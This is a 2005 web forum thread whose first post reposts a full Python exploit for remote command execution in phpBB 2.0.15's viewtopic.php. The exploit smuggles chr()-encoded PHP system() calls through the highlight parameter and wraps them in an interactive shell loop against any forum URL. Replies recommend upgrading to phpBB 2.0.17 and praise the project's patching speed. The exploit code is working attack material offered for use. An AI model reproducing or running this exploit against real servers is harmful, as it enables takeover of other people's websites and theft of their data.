 [exploit] Phpbb 2.0.15 "viewtopic.php", Remote PHP Code Execution Exploit |
|
|
|
|
  |
 Sep 1 2005, 10:50 AM
Post
#1
|
|
|
Advanced Member  Group: Members Posts: 119 Joined: 3-August 05 Member No.: 10,207  |
phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit
CODE #!/usr/bin/pyth0n print "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org" print " well, just because there is none." import sys from urllib2 import Request, urlopen from urlparse import urlparse, urlunparse from urllib import quote as quote_plus INITTAG = '<g0>' ENDTAG = '</g0>' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0])) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += "printf(" + makecmd(INITTAG) + ").system(%s)." _ex += "printf(" + makecmd(ENDTAG) + ").%%27" def usage(): print """Usage: %s <forum> <topic> forum - fully qualified url to the forum example: http://www.host.com/phpBB/ topic - ID of an existing topic. Well you will have to check yourself. """[:-1] % sys.argv[0]; sys.exit(1) if __name__ == '__main__': if len(sys.argv) < 3 or not sys.argv[2].isdigit(): usage() else: url = sys.argv[1] if url.count("://") == 0: url = "http://" + url url = list(urlparse(url)) host = url[1] if not host: usage() if not url[0]: url[0] = 'http' if not url[2]: url[2] = '/' url[3] = url[4] = url[5] = '' url = urlunparse(url) if url[-1] != '/': url += '/' topic = quote_plus((sys.argv[2])) while 1: try: cmd = raw_input("[%s]$ " % host).strip() if cmd[-1]==';': cmd=cmd[:-1] if (cmd == "exit"): break else: cmd = makecmd(cmd) out = _ex % (url,topic,cmd) try: ret = urlopen(Request(out)).read() except KeyboardInterrupt: continue except: pass else: ret = ret.split(INITTAG,1) if len(ret)>1: ret = ret[1].split(ENDTAG,1) if len(ret)>1: ret = ret[0].strip(); if ret: print ret continue; print "EXPLOIT FAILED" except: continue This post has been edited by cmatcmextra: Sep 1 2005, 10:52 AM |
 |
 
|
|
Sep 1 2005, 05:00 PM
Post
#2
|
|
|
Privileged Member Group: Members Posts: 702 Joined: 17-February 05 Member No.: 3,817 |
YOu could give secutiry updates link of phpbb dot com homepage. Not only phpbb 2.0.15 has security exploits even 2.0.16 also has one or more problem and phpbb has already released 2.0.17 sometime ago fixing all the exploits found so far and have advised all the software users to upgrade their forums/boards as soon as possible.
I was updating one of the boards from 2.0.10 to 2.0.17 it took more than 2 hours to finish all the updates and now I can sleep peacefully. Those who haven't updated their boards can look for upgrade mods which is good for those who installed many mods in their boards. Look out for those mods from phpbb dot come homepage. |
|
|
|
|
Sep 2 2005, 09:55 AM
Post
#3
|
|
|
$p4m 0n j00 $h4m3 m3 0nc3 $p4m 0n m3 $h4m3 m3 7\/\/1c3 Group: [HOSTED] Posts: 6,308 Joined: 21-September 04 From: 9r33|\| 399$ 4|\|D 5P4/\/\ Member No.: 1,218  |
its amazing i don't know whos coming out with more bugs ipb or phpbb, but yeah you let those at phpbb know about this as well.
|
|
|
|
|
Sep 2 2005, 01:16 PM
Post
#4
|
|
|
Member [Level 3] Group: Members Posts: 94 Joined: 2-January 05 From: Dotian.com Member No.: 3,085 |
As with all other software and scripts, PHPbb also has a long history of vulnerabilities. But it is better than others because of quick developer community reponce towards new found security loopholes.
PHPbb issues are fixed generally very less time then other systems. and that is why I like PHPbb. For the user, it is always a good practice to bookmark the PHPbb homepage to get the update news at time. |
|
|
|
|
Similar Topics
|
Lo-Fi Version | Time is now: 26th July 2008 - 02:49 PM |